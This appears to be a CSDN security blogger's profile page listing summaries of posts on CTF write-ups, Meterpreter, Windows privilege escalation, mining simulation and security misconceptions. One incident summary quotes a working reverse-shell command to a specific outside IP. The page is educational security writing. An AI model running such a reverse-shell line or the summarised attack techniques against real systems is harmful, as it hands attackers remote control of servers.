ailx10
码龄11年
求更新 关注
提问 私信
  • 博客:466,082
    社区:76
    问答:1,509
    动态:259
    467,926
    总访问量
  • 899
    原创
  • 721
    粉丝
  • 63
    关注
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:北京市
加入CSDN时间: 2014-06-16

个人简介:ailx10 网络安全

博客简介:

ailx10

博客描述:
网络安全
查看详细资料
个人成就
  • 获得1,322次点赞
  • 内容获得66次评论
  • 获得1,730次收藏
  • 代码片获得1,922次分享
  • 博客总排名21,880名
  • 原力等级
    原力等级
    5
    原力分
    1,299
    本月获得
    6
创作历程
  • 137篇
    2025年
  • 116篇
    2022年
  • 121篇
    2021年
  • 182篇
    2020年
  • 190篇
    2019年
  • 133篇
    2018年
  • 13篇
    2017年
  • 7篇
    2016年
成就勋章
TA的专栏
  • CISSP备考
    付费
    50篇
  • 渗透测试
    3篇
  • 体会心得
    27篇
  • 算法研究
    1篇
  • python数据分析
    1篇
  • python爬虫
  • 求职面试
    5篇
  • 安全入门
    2篇
  • c语言应用
    2篇
  • 内网安全
    15篇
  • spark
    21篇
  • 病毒查杀
    2篇
  • 安全防护
    1篇
  • php入门
    10篇
  • 攻击检测
    2篇
  • 漏扫工具
    2篇
  • 零信任
    3篇
  • python-flask
    8篇
  • 台湾漏洞库
    3篇
  • 行侠仗义
    2篇
  • 考研考试
    3篇
  • 抽奖活动
    2篇
  • 行业分析
    1篇
  • 软考中级
    1篇
  • 学生实验
    13篇
  • web安全
    1篇
  • 年度总结
    2篇
  • 网络安全
    3篇
  • 环境搭建
    1篇
  • 学术论文
    1篇
  • 笔试经验

TA关注的专栏 0

TA关注的收藏夹 0

TA关注的社区 4

TA参与的活动 0

兴趣领域 设置
  • 网络空间安全
    系统安全web安全安全架构
创作活动更多

AgenticCoding·十二月创作之星挑战赛

随着寒风渐起,十二月悄然来临,猫头虎诚挚邀请您加入一场别开生面的创意与技术挑战!本次博客挑战赛聚焦AI编程、AgenticCoding、开源实践等前沿主题,激发您在编程与AI领域的无限创作潜能。 无论您是AI的初学者,还是技术界的资深创作者,这里都是您展示才华、碰撞灵感的最佳舞台。您可以: 1.深入解析AI与编程领域的最新技术动态,引领行业发展趋势 2.分享AI技术在实际工作的项目中的创新应用与解决方案 3.揭示您在开源社区中的宝贵经验与独到见解 **活动须知:** 1.参赛者可加入专属活动围观交流群,和其他创作者互动交流,分享心得,互相激励与支持。答疑与围观群请点击右侧群链接:[https://bbs.csdn.net/topics/619770678](https://bbs.csdn.net/topics/619770678) 2.文章质量评分查询入口:[点击查看评分入口](https://www.csdn.net/qc) **我们诚挚邀请您参加「AgenticCoding·十二月创作之星挑战赛」!** 在这个寒冷的十二月,让我们携手借助AI的力量,点亮创作之星的光辉之路,开启属于您的创作之旅!

42人参与 去参加
  • 最近
  • 文章
  • 专栏
  • 代码仓
  • 资源
  • 收藏
  • 关注/订阅/互动
更多
  • 最近

  • 文章

  • 专栏

  • 代码仓

  • 资源

  • 收藏

  • 关注/订阅/互动

  • 社区

  • 帖子

  • 问答

  • 课程

  • 视频

搜索 取消

网络空间安全中的误区(网络空间安全真相)

《网络空间安全真相》一书揭示了18个常见行业误区,作者通过170多个争议话题探讨了网络安全本质。文章指出:1)安全首要目标是支撑业务而非绝对防护;2)威胁情报质量重于数量;3)没有绝对安全的系统或产品;4)开源未必更安全,流行系统更易暴露漏洞;5)攻防对抗中防御难度常被低估。作者结合自身攻防经验强调,网络安全是动态平衡而非技术堆砌,需兼顾实效性与业务需求。文中还反思了密码策略、黑客演示可信度等认知偏差,指出安全与隐私并非零和博弈。
原创
博文更新于 2025.07.07 ·
945 阅读 ·
8 点赞 ·
0 评论 ·
29 收藏

认知偏见(网络空间安全真相)

《网络空间安全真相》揭示了11种常见的网络安全偏见,包括:行动偏见(急于响应钓鱼邮件)、忽略偏见(忽视简单密码风险)、幸存者偏见(低估数据泄露普遍性)等。这些认知偏差往往导致企业忽视潜在风险,如过度自信认为系统绝对安全,或盲目追随大公司技术选择。典型案例显示,即便投入巨资追求零风险,仍可能因低估低概率高危害攻击而遭受损失。该书通过170多个争议话题,破除行业谬误,强调安全决策需摒弃偏见,进行客观风险评估。
原创
博文更新于 2025.07.04 ·
1075 阅读 ·
18 点赞 ·
0 评论 ·
9 收藏

网络安全碎碎恋

《一个安全开发者的成长与困惑》摘要:作者分享了自己从安全工具开发转向攻击图谱项目的经历,通过深入理解各类安全日志,为不同项目定制攻击链路分析。近期专注登录异常场景建设,工作充实但感慨时光易逝。对比2023年护网与2024年常态化工作的变化,预测2025年安全大模型将带来行业变革。文章最后反思网络安全从业者的职业定位,质疑这个被过度美化的"江湖"究竟谁能笑到最后。全文展现了技术成长的喜悦与行业前景的忧虑交织的复杂心绪。(148字)
原创
博文更新于 2025.06.29 ·
246 阅读 ·
6 点赞 ·
0 评论 ·
0 收藏

手机流量监控App(GlassWire)使用指南

手机经常被监控的朋友都知道,网络上的xx帮你解除手机监控,大多数都是广告和骗子,毫不夸张的说99.99%都是广告和骗子,如果你相信自己是那个“万里挑一”之人,那么你就掏钱吧,如果超过999块钱,100%是骗子。别抬杠,抬杠就是你是对的。你可以查看手机静默状态下,哪些App在偷偷跑流量,也可以使用防火墙功能,随时随地的让哪些App使用。你只要下载一个手机App,就知道手机到底有没有被监控了,在。活动,这里第一时间就可以监控到,如果发现了木马App,只要点击Firewall(防火墙)就能阻断木马活动了。
原创
博文更新于 2025.06.29 ·
424 阅读 ·
8 点赞 ·
0 评论 ·
1 收藏

Bugku-CTF-web(适合初学者)

本文分享了Bugku-CTF-web平台1-10题的解题思路,适合初学者学习基础网络安全知识。通过查看源代码、响应头分析、目录遍历、备份文件查找等方法,涉及Base64/Unicode编码、MD5绕过、PHP弱类型比较等知识点。解题过程包含使用F12开发者工具、dirb目录扫描、wget下载.git文件、Hackbar插件发送POST请求等实操技巧,并提供了Python和PHP代码示例来辅助解题。这些基础题目帮助新手掌握Web安全的基本技能和思维方式。
原创
博文更新于 2025.06.25 ·
569 阅读 ·
24 点赞 ·
0 评论 ·
20 收藏

模拟XMRig挖矿通信流量

本文介绍了一个用于安全演示的Python程序,模拟XMRig挖矿通信流量。程序包含客户端和服务端两部分,其中服务端改进为多线程守护进程,支持多个矿工连接。模拟挖矿函数mine()可在约2秒内完成挖矿,CPU使用率达100%,且可通过调整target参数控制挖矿难度。作者还展示了使用WireShark进行流量分析的方法。该程序完整还原了XMRig挖矿的通信行为,适用于网络安全演示场景。
原创
博文更新于 2025.06.25 ·
322 阅读 ·
9 点赞 ·
0 评论 ·
1 收藏

Meterpreter 简单入门

本文简要介绍了Meterpreter后渗透测试工具的基本使用方法,包括控制端配置、载荷生成与投递、核心命令操作等内容。文章详细列举了Meterpreter在文件操作、网络监控、系统控制、用户界面交互、摄像头操作等方面的常用命令,如上传下载文件、获取系统信息、键盘记录、屏幕截图等。同时还介绍了权限提升、密码数据库导出等高级功能。这些命令可以帮助安全人员快速了解Meterpreter的强大功能,适用于网络安全入门学习和渗透测试实践。
原创
博文更新于 2025.06.23 ·
1067 阅读 ·
6 点赞 ·
0 评论 ·
19 收藏

Win10提权简单入门

本文介绍了利用Metasploit框架进行Windows 10提权的实验过程。首先通过生成恶意载荷获取普通用户权限,随后使用local_exploit_suggester模块检测可用提权漏洞。重点演示了bypassuac_fodhelper漏洞的利用方法,通过简单配置成功将普通权限提升至SYSTEM权限。实验证明,在关闭杀毒防护的情况下,Windows提权操作相对简单。需要注意的是,该技术仅适用于安全研究和合法授权场景。
原创
博文更新于 2025.06.23 ·
327 阅读 ·
5 点赞 ·
0 评论 ·
4 收藏

收手吧,在矿池打工的XMRig

摘要:挖矿收益微乎其微,2台服务器运行24小时预估收益仅1分钱。测试使用XMRig程序连接矿池,12小时仅挖到0.00000466门罗币(约0.00549元)。文章还演示了自动下载挖矿程序、添加计划任务和启动项的脚本代码,并通过tcpdump抓包分析挖矿通信流程。结论:普通设备挖矿入不敷出,且存在法律风险,不建议尝试。(98字)
原创
博文更新于 2025.06.23 ·
380 阅读 ·
5 点赞 ·
0 评论 ·
10 收藏

sqlite3 数据库反弹shell

摘要:一位开发者在Python Flask项目中仅开放80端口并使用SQLite3数据库,未做安全校验,导致网站一天内被黑客攻陷。黑客利用SQLite3支持shell命令的特性,通过反弹shell(如bash -i >& /dev/tcp/144.34.162.13/6666 0>&1)控制服务器。漏洞源于代码未过滤用户输入,直接执行数据库操作。事后开发者优化了代码,记录了漏洞扫描IP,并检查服务器未发现rootkit残留。该事件暴露了SQLite3命令执行风险及输入校验的重要性
原创
博文更新于 2025.06.22 ·
380 阅读 ·
5 点赞 ·
0 评论 ·
7 收藏

GoDaddy域名托管到Cloudflare

上周,花了300多块钱,买了 GoDaddy 的域名(3年),结果不让转移到其他厂商,正郁闷呢。打拒绝服务攻击流量,果然成功防御了,GoDaddy 域名托管到 Cloudflare,轻轻松松获得安全防护,爱了爱了。(7)设置域名服务器,选择使用自己的域名服务器,粘贴Cloudflare为你分配的域名服务器。(8)点击保存,提示成功,正在处理申请,我的不到10分钟就好了,最迟24小时。(不是转移),也就是开启小黄云,免费获得 Cloudflare 的。(3)点击继续,进入域名管理,可以添加子域名A记录等。
原创
博文更新于 2025.06.22 ·
510 阅读 ·
2 点赞 ·
0 评论 ·
3 收藏

Cloudflare 域名站点自带DDoS防御

打7层DDoS,Cloudflare 配置了L7层的CC防御,显示拦截了90%的CC流量,结果站点访问很卡,但是正常用户依然能访问。可自动缓解基于 HTTP 的 DDoS 攻击,如 HTTP 泛洪、放大 HTTP 攻击和反射 HTTP 攻击。可自动缓解基于 SSL/TLS 和网络层 DDoS 攻击,如 SYN 泛洪和 UDP 反射攻击。4、自动拦截4层DDoS攻击(为啥我 hping3 发不出去,大雾)打4层DDoS,结果直接无法用了(大雾),可能是。(1)HTTP DDoS 攻击防护(自己配置的)
原创
博文更新于 2025.06.22 ·
379 阅读 ·
3 点赞 ·
0 评论 ·
5 收藏

Bugku-CTF-web

本文总结了Bugku-CTF平台61-67题Web安全挑战的解题思路,涉及多种高级漏洞利用技术。重点包括:1. Java反序列化漏洞(61题)使用ysoserial生成payload实现RCE;2. Python反序列化(63题)通过pickle模块构造恶意对象;3. Fastjson反序列化(64题)利用JNDI注入实现远程代码执行;4. 模板注入绕过(65题)巧妙构造SSTI payload;5. CBC字节翻转攻击(66题)通过修改IV和密文控制解密结果;6. 创新文件删除技术(67题)结合ZipAr
原创
博文更新于 2025.06.22 ·
673 阅读 ·
24 点赞 ·
0 评论 ·
17 收藏

漏洞(网络空间安全真相)

《网络安全认知误区解析》 《网络空间安全真相》一书揭示了网络安全领域的常见认知误区。作者指出:1)漏洞并不罕见,仅2023年就披露2.8万个漏洞;2)攻击者并非都专业,10年前的攻击手法仍在被使用;3)漏洞修复存在滞后性,部分厂商半年仍未修补已知漏洞;4)并非所有攻击都依赖技术漏洞,社会工程学同样有效;5)简单代码也存在漏洞,且旧的安全防御措施会随时间失效。 文章还强调,漏洞评分复杂且名称不能反映重要性,而漏洞披露流程也存在合规风险(如阿里云被罚案例)。这些认知误区提醒我们,网络安全需要持续更新防御策略。
原创
博文更新于 2025.06.13 ·
847 阅读 ·
12 点赞 ·
0 评论 ·
10 收藏

普通人怎样用好Deepseek?

【摘要】作者分享了借助DeepSeek AI工具提升工作效率的经历:2025年4月通过DeepSeek实现了日志工具的远程代理功能,使其成为团队标准工具;探讨了专家需兼具深度与广度的矛盾性,指出AI工具让普通人也能成为"爽文男主"型专家;反思对新兴技术的认知局限(最初低估DeepSeek,后见证其爆发);强调要善用AI提示词工程(如RTGO结构)和"科技与狠活"方法快速构建智能体;提出普通人使用AI的关键在于实践应用与持续学习(看书+实战+交流+总结)。文章展现了AI
原创
博文更新于 2025.06.13 ·
958 阅读 ·
7 点赞 ·
0 评论 ·
16 收藏

工作邮箱收到钓鱼邮件,点了链接进去无法访问,会有什么问题吗?

【摘要】网络安全实验揭示邮件防范漏洞:研究人员测试勒索攻击时发现,邮件网关能拦截exe/bat程序及压缩包,但钓鱼网址可突破防御。攻击者诱导用户下载含pdf的压缩包,打开时后台同步运行加密程序,将密钥传至服务器,导致文件被加密。实验证明看似无害的pdf可能隐藏恶意代码,提醒用户谨慎处理邮件附件和不明链接。(150字)
原创
博文更新于 2025.06.08 ·
283 阅读 ·
9 点赞 ·
0 评论 ·
1 收藏

如何在最短时间内提升打ctf(web)的水平?

《高效刷题提升CTF-web技能的三步法》摘要:本文分享刷题提升CTF-web技能的有效方法,建议采用三遍刷题法:第一遍看writeup理解思路,第二遍独立解题,第三遍讲解思路加深理解。文章按难度系数1-5分类整理了Bugku-CTF的web题目路线:从基础的源代码审计、前端绕过(难度1),到目录扫描、PHP特性利用(难度2),再到SQL注入、文件包含(难度3),以及XSS、反序列化(难度4),最后到盲注、原型链污染等高阶技巧(难度5)。这种阶梯式训练配合三遍学习法,能系统性地提升CTF-web实战能力。
原创
博文更新于 2025.06.08 ·
1031 阅读 ·
18 点赞 ·
0 评论 ·
16 收藏

Bugku-CTF-Web安全最佳刷题路线

《CTF刷题路线:Web安全从入门到进阶》 摘要:本文为网络安全爱好者提供Bugku-CTF平台Web安全方向的系统性刷题路线。按照难度系数划分为5个等级,涵盖基础到高阶的Web安全知识点。从简单的查看源代码、绕过前端限制等基础操作(难度1),到SQL注入、文件包含(难度3),再到XSS、反序列化等高级漏洞利用(难度4-5)。每道题目都标注了核心考察点,如Burp使用、PHP伪协议、Flask模板注入等,帮助学习者循序渐进掌握Web安全攻防技能。作者ailx10作为网络安全领域优秀答主,分享其整理的实战刷题
原创
博文更新于 2025.06.07 ·
1120 阅读 ·
6 点赞 ·
0 评论 ·
19 收藏

xctf-weak_auth(弱口令)

摘要:文章探讨了网络安全中的弱口令漏洞问题,指出HTTP登录中使用弱口令(如"admin/123456")会带来严重风险。弱口令具有三个特点:短小(易被暴力破解)、简单(含常见词汇或连续数字)、缺乏复杂性(缺少大小写字母和特殊字符组合)。作者以实例演示了如何通过猜测简单密码获取系统权限,并提醒密码设置需在安全性与易记性间取得平衡。该内容出自网络安全专栏,由专业攻防人员撰写,旨在普及Web安全基础知识。
原创
博文更新于 2025.06.07 ·
324 阅读 ·
5 点赞 ·
0 评论 ·
1 收藏

xctf-bilibili(Intruder,JWT,Python反序列化)

这篇CISCN竞赛分析展示了从JWT破解到Python反序列化的完整渗透过程。首先通过BurpSuite Intruder模块定位lv6购买页面,发现需要admin权限后,对JWT进行暴力破解获得密钥"1Kun",伪造admin令牌进入后台获取源码。审计发现Python2.7存在pickle反序列化漏洞,构造恶意序列化字符串执行系统命令,最终通过cat/flag.txt获取flag。整个过程融合了web渗透、加密破解和代码审计技术,体现了典型的多层次安全攻防思路。
原创
博文更新于 2025.06.05 ·
635 阅读 ·
22 点赞 ·
0 评论 ·
10 收藏
加载更多